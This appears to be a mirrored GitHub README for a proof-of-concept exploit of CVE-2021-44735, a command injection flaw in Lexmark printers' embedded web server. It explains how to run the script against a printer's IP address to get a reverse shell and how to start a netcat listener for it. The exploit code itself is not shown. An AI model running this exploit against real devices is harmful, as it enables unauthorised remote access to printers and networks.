defensor / CVE-2021-44735

Exploit for CVE-2021-44735

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2021-44735 PoC

Embedded web server command injection vulnerability in Lexmark devices. Exploit based on the following research https://www.crowdstrike.com/blog/how-to-compromise-a-printer-in-3-simple-steps/.

Using

To run the exploit pass 3 arguments:

  • rhost - printer IP-address
  • lhost - IP-address of the interface for reverse-shell connection
  • lport - port number for reverse-shell connection
python3 cve-2021-44735.py -r <rhost> -l <lhost> -p <lport>

To receive a reverse-shell connection start listener on the specified lhost and lport, for example using netcat:

nc -nvlp 80

About

Exploit for CVE-2021-44735


Languages

Language:Python 100.0%